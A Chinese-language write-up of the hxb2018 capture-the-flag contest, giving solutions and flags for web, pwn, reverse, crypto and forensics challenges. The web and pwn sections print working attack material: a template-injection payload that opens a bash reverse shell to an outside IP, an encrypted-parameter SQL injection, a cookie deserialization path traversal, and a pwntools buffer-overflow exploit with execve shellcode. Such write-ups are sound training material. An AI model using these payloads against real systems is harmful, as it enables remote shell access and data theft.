内容简介:共 15 题,解出 12 题。比赛平台入口地址:关注合天智汇公众号,回复hxb2018获得flag
共 15 题,解出 12 题。
比赛平台入口地址: http://hxb.erangelab.com/
Welcome - SingIn - 50pt
关注合天智汇公众号,回复hxb2018获得flag
http://hxb2018.oss-cn-beijing.aliyuncs.com/heetian.jpg
hxb2018{W3lc0me_T0_Hxb2o18}
Web - XmeO - 150pt
管理员的flag在哪里?
47.107.235.223:9990
注册帐号,登录,提交 Todo List,然后点 Show,存在模板注入漏洞
{{ ''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('echo "bash -i >& /dev/tcp/222.85.25.45/5555 0>&1">/tmp/xx1x1') }} {{ ''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('bash /tmp/xx1x1') }}
拿到 Shell 后全局搜索 Flag,关键词 hxb
Flag: hxb2018{510243761ff63759ed7fe96ca2759e45}
Web - Code Check - 200pt
code check 120.79.246.58:49882
源码 news 目录下 list.php
源码泄漏:http://120.79.246.58:49882/news/list.zip
<?php header('content-type:text/html;charset=utf-8'); require_once '../config.php'; //解密过程 function decode($data){ $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,''); mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021'); $data = mdecrypt_generic($td,base64_decode(base64_decode($data))); mcrypt_generic_deinit($td); mcrypt_module_close($td); if(substr(trim($data),-7)!=='hxb2018'){ echo '<script>window.location.href="/index.php";</script>'; }else{ return substr(trim($data),0,strlen(trim($data))-7); } } $id=decode($_GET['id']); $sql="select id,title,content,time from notice where id=$id"; $info=$link->query($sql); $arr=$info->fetch_assoc(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>X公司HR系统V1.0</title> <style>.body{width:600px;height:500px;margin:0 auto}.title{color:red;height:60px;line-height:60px;font-size:30px;font-weight:700;margin-top:75pt;border-bottom:2px solid red;text-align:center}.content,.title{margin:0 auto;width:600px;display:block}.content{height:30px;line-height:30px;font-size:18px;margin-top:40px;text-align:left;color:#828282}</style> </head> <body> <div class="body"> <div class="title"><?php echo $arr['title']?></div> <div class="content"><?php echo $arr['content']?></div> </body>
Encoder
<?php function encode($data){ $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,''); mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021'); $da = mcrypt_generic($td,$data); mcrypt_generic_deinit($td); mcrypt_module_close($td); return base64_encode(base64_encode($da)); }
推测注入,id 加密过
http://120.79.246.58:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZ0
databases: information_schema,mozhe_discuz_stormgroup,mysql,test mozhe_discuz_stormgroup: notice,notice2,stormgroup_member notice: id,title,content,time notice2: id,title stormgroup_member: id,name,password,status
构造:
var_dump(encode("0 union select 1,(select group_concat(title) from notice2),3,4hxb2018"));
http://120.79.246.58:49882/news/list.php?id=K3hId1N2UVpNcjFENkFja0FtMHdrM0pscGduTzFNZk1uZzVVVVdLK2hjbDVqUTBhOFl6b29YOFA1amZ5R3NUeVZOdDdOZ2luNmZMaXV4bmNRZVd1Yi9CV2hmaGJTbUdJTjJrdndKQjBEam89
Flag: hxb2018{088425ca08783233bbe9d21a3015f5f6}
Web - MyNote - 350pt
Cookie 反序列化
Warning: file_get_contents(./upload/9dd4e461268c8034f5c8564e155c67a6/1.php): failed to open stream: No such file or directory in /var/www/html/views/Views.php on line 65
<?php $b=array("../../flag.php"); var_dump(serialize($b)); var_dump(base64_encode(serialize($b))); unserialize(serialize($b));
cookie YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30=
PD9waHAKCiRmbGFnID0gImh4YjIwMTh7ODNmMmVhMDBiOTczNWQyYTQ1ZjMxNGJmMmViZmVhZTB9IjsKZWNobyAiZmxhZ3tUaGlzX2ZsYWdfaVNfQV9GNGtlX2ZsYWd9IjsKCg==
<?php $flag = "hxb2018{83f2ea00b9735d2a45f314bf2ebfeae0}"; echo "flag{This_flag_iS_A_F4ke_flag}";
Flag: hxb2018{83f2ea00b9735d2a45f314bf2ebfeae0}
Misc - Flow - 200pt
流量取证,这个流量包中隐藏着一些秘密,你能找出来吗?
http://hxb2018.oss-cn-beijing.aliyuncs.com/misc/flow_6D1210D1307A67E4A428602F722E6803.zip
打开全是 802.11 包
上 aircrack-ng 破解密码
可以知道,SSID 是 ctf,密码是 password1
使用 Wireshark 的自动解密功能
然后过滤器使用 http
即可看到 flag
Flag: flag{H4lf_1s_3n0ugh}
Reverse - HighwayHash64 - 300pt
口算哈希说的就是你吧~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/reverse_1CE475F54D2A3264A8ED743FDFEF24A8.zip
sub_1400017A0
为 HighwayHash64 摘要计算
flag 格式: hxb2018{xxxxx}
第一个判断,用来验证 flag 的长度,经过爆破,确定 flag 的长度为 19
第二个判断,用来验证 flag 格式内的值,也可以爆破,来确定 flag 格式内的值
需要注意,计算摘要时用到的默认 Key 被修改了
附上 flag 值爆破脚本:
from highwayhash import * # https://github.com/kpdemetriou/highwayhash-cffi # you need to modify sources/highwayhash.c # void HighwayHashReset(const uint64_t key[4], HighwayHashState* state) { # state->mul0[0] = 0x1BE6D5D5FE4CCE2Full; # state->mul0[1] = 0x24093822299F31D0ull; # state->mul0[2] = 0x33198A2E03707344ull; # state->mul0[3] = 0x443F6A8885A308D3ull; # state->mul1[0] = 0x5BD39E10CB0EF593ull; # state->mul1[1] = 0x60ACF169B5F18A8Cull; # state->mul1[2] = 0x7E5466CF34E90C6Cull; # state->mul1[3] = 0x852821E638D01377ull; # state->v0[0] = 0xCF0C0C1ED5EDF3E; # state->v0[1] = state->mul0[1] ^ 0x3F3E3D3C3B3A1918ull; # state->v0[2] = state->mul0[2] ^ 0x1226252423222121ull; # state->v0[3] = state->mul0[3] ^ 0x2F2E2D2C2B2A2928ull; # state->v1[0] = state->mul1[0] ^ 0x1312111117161514ull; # state->v1[1] = state->mul1[1] ^ 0x3B3A19183F3E3D3Cull; # state->v1[2] = state->mul1[2] ^ 0x2322212112262524ull; # state->v1[3] = state->mul1[3] ^ 0x2B2A29282F2E2D2Cull; # } # and then, run `python3 setup.py install` to build & install it key = b"\x00" * 32 i=0 while True: i+=1 if i%100000==0: print (i/float(10000000000)) data=str(i) data=data.rjust(10,'0') data=bytes(data,'ascii') op=highwayhash_64(key, data) if op==b'\x5a\x54\x30\x87\xaf\x26\xbe\xe3': print (i) break
爆破得到 flag 格式内的值,应该是一个时间戳
Flag: hxb2018{1532649708}
Reverse - Replace - 300pt
简单的...密码学~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/Replace_B21DA8B2F172C13764989DF0F99B890A.rar
很简单,直接贴上脚本:
r=[ 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16, ] t='2a49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad67786e21d5adae6' flag='' for i in range(35): t1=ord(t[2*i]) t2=ord(t[2*i+1]) if t1<48 or t1>57: t1-=87 else: t1-=48 if t2<48 or t2>57: t2-=87 else: t2-=48 t1&=0xff t2&=0xff tmp=(t1*16+t2)^0x19 tmp&=0xff for j in range(len(r)): if r[j]==tmp: flag+=chr(j) break print flag
Flag: flag{Th1s_1s_Simple_Rep1ac3_Enc0d3}
Crypto - Common Crypto - 200pt
Please enter your flag http://hxb2018.oss-cn-beijing.aliyuncs.com/crypto/crypto_3ED9C81B3AD33F8ABEA1984B2B69284A.zip
AES 算法,挺简单的。
直接贴脚本:
from Crypto.Cipher import AES enc='461559ceb56d277df44a31ae89f08a6a33626430326635343563373032383031'.decode('hex') key='\x1B\x2E\x35\x46\x58\x6E\x72\x86\x9B\xA7\xB5\xC8\xD9\xEF\xFF\x0C' mode=AES.MODE_ECB c=AES.new(key,mode,key) print c.decrypt(enc[:16])+enc[16:]+'}'
Flag: hxb2018{bc69322f3bd02f545c702801}
Reverse - More efficient than JS - 300pt
蓝色的火狐和黄色的谷歌更配哦~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/attach_9550FD3DD9774159E9955E2A0E389842.zip
wasm 文件逆向,可以用 wasmdec 生成伪 c 代码
然后人工分析,可以逆出验证部分的代码
附上解密脚本:
mem_data=[ 0xdf, 0x81, 0x7f, 0x20, 0x07, 0xc4, 0x0d, 0x1c, 0xc9, 0x9e, 0x8e, 0x17, 0xd7, 0xed, 0x78, 0x50, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x20, 0x69, 0x6e, 0x70, 0x75, 0x74, 0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x66, 0x6c, 0x61, 0x67, 0x3a, 0x0a, 0x00, 0x25, 0x73, 0x00, 0x49, 0x5f, 0x61, 0x6d, 0x5f, 0x6b, 0x65, 0x79, 0x00, 0x79, 0x65, 0x73, 0x00, 0x6e, 0x6f, 0x00, 0x69, 0x6e, 0x66, 0x69, 0x6e, 0x69, 0x74, 0x79, 0x00, 0x00, 0x01, 0x02, 0x04, 0x07, 0x03, 0x06, 0x05, 0x00, 0x2d, 0x2b, 0x20, 0x20, 0x20, 0x30, 0x58, 0x30, 0x78, 0x00, 0x28, 0x6e, 0x75, 0x6c, 0x6c, 0x29, 0x00, 0x2d, 0x30, 0x58, 0x2b, 0x30, 0x58, 0x20, 0x30, 0x58, 0x2d, 0x30, 0x78, 0x2b, 0x30, 0x78, 0x20, 0x30, 0x78, 0x00, 0x69, 0x6e, 0x66, 0x00, 0x49, 0x4e, 0x46, 0x00, 0x6e, 0x61, 0x6e, 0x00, 0x4e, 0x41, 0x4e, 0x00, 0x2e, ] mem='' for i in mem_data: mem+=chr(i) key=mem[4475-1024-3408:4475-1024-3408+8] enc=mem[4432-1024-3408:4432-1024-3408+15] print key print enc.encode('hex') table1=[] table2=[] for i in range(256): table1.append(i) table2.append(ord(key[i%8])) tmp=0 for i in range(256): tmp=(tmp+table1[i]+table2[i])&0xff table1[i],table1[tmp]=table1[tmp],table1[i] flag='' tmp=0 for i in range(len(enc)): c=(i+1)&0xff tmp=(tmp+table1[c])&0xff table1[c],table1[tmp]=table1[tmp],table1[c] flag+=chr(ord(enc[i])^table1[(table1[c]+table1[tmp])&0xff]) print flag
Flag: flag{happy_rc4}
PWN - Regex Format - 350pt
关键点在正则匹配的时候,&s 在栈上可溢出,直接在 bss 写 shellcode ,然后 ROP
贴一下POC:
from pwn import * #io=process('./pwn1') io=remote('47.107.172.28',8888) payload=':a\x08\x04\xa3\x50$*' io.sendafter('format\n',payload) shellcode='\x90'*5 shellcode+='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' payload='Before use it, understand it first.' payload+='a'*0xd8+p32(0x804a350)+shellcode io.sendafter('match\n',payload) print io.sendlineafter('[Y/n]\n','n') io.interactive()
Flag: hxb2018{214ebb03581966cf32cc351dd233e7fc}
Web - Readflag - 250pt
拿到题,网页提示用 url
参数来 ssrf
查看 header
,看到是 apache
,直接读配置文件
看到网站根目录下的 php 文件,继续读
源代码里在某个条件下,可以调用 readflag
文件,进而读到 flag
那么直接把 readflag
文件下载下来,逆向一下
可以看到 flag 文件就叫 flag
,直接读出来
Flag: hxb2018{0ef0c0d15f1a22b47af2a01669fbf124}
Misc - Disk - 200pt
磁盘隐写,这个磁盘上隐藏着一些秘密,你能找出来吗?
http://hxb2018.oss-cn-beijing.aliyuncs.com/misc/disk_95ED58BC6E172FABFEE602D4513E2BE7.zip
一个 vmdk 文件,看了一下里面是 NTFS 格式,可以用 RecuperaBit 来分析
分析命令如下:
python main.py ctf-flat.vmdk [ENTER] recoverable tree 0
可以看到有 flag0.txt
/ flag1.txt
/ flag2.txt
/ flag3.txt
4个文件,里面都写着 flag is not here.
另外还能看到,这四个文件有 ads 流,所以隐藏数据应该在这里
用下面的命令逐个导出:
restore 0 33:ads restore 0 34:ads restore 0 35:ads restore 0 36:ads
在默认输出 recuperabit_output
文件夹里可以看到,四个已经导出的 ads 流文件
4 个文件里都是 1
和 0
组成的二进制字符,将 4 个文件里的内容顺序拼接,然后二进制转换成字符串,就能得到 flag 了
Flag: flag{4DS_1n_D1sk}
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
编写可读代码的艺术
Boswell, D.、Foucher, T. / 尹哲、郑秀雯 / 机械工业出版社 / 2012-7-10 / 59.00元
细节决定成败,思路清晰、言简意赅的代码让程序员一目了然;而格式凌乱、拖沓冗长的代码让程序员一头雾水。除了可以正确运行以外,优秀的代码必须具备良好的可读性,编写的代码要使其他人能在最短的时间内理解才行。本书旨在强调代码对人的友好性和可读性。 本书关注编码的细节,总结了很多提高代码可读性的小技巧,看似都微不足道,但是对于整个软件系统的开发而言,它们与宏观的架构决策、设计思想、指导原则同样重要。编......一起来看看 《编写可读代码的艺术》 这本书的介绍吧!